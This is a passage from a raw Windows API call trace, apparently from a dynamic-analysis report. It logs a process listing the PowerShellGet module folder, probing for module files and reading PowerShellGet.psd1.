ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0224.842] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.843] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0224.843] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.843] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.843] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.843] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0224.844] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0224.844] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0224.844] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0224.844] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0224.845] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.845] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0224.845] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.845] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.846] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.846] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0224.846] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0224.846] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0224.846] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0224.847] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.847] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.847] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0224.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc30) returned 1 [0224.847] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dd10 | out: lpFileInformation=0x653ef8dd10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbf0) returned 1 [0224.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc80) returned 1 [0224.847] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0224.847] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8d990 | out: lpFindFileData=0x653ef8d990*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.848] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.848] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0224.848] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0224.849] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0224.849] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0224.849] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0224.849] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0224.850] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbb0) returned 1 [0224.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db70) returned 1 [0224.850] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0224.850] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0224.850] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0224.850] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0224.850] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0224.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0224.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.851] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.851] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0224.851] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.851] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.852] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0224.852] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.852] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0224.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de30) returned 1 [0224.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df10 | out: lpFileInformation=0x653ef8df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0224.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ddf0) returned 1 [0224.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0224.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dbd0) returned 1 [0224.853] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f4 [0224.853] GetFileType (hFile=0x6f4) returned 0x1 [0224.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db40) returned 1 [0224.853] GetFileType (hFile=0x6f4) returned 0x1 [0224.853] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.854] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.855] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.855] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.855] ReadFile (in: hFile=0x6f4, 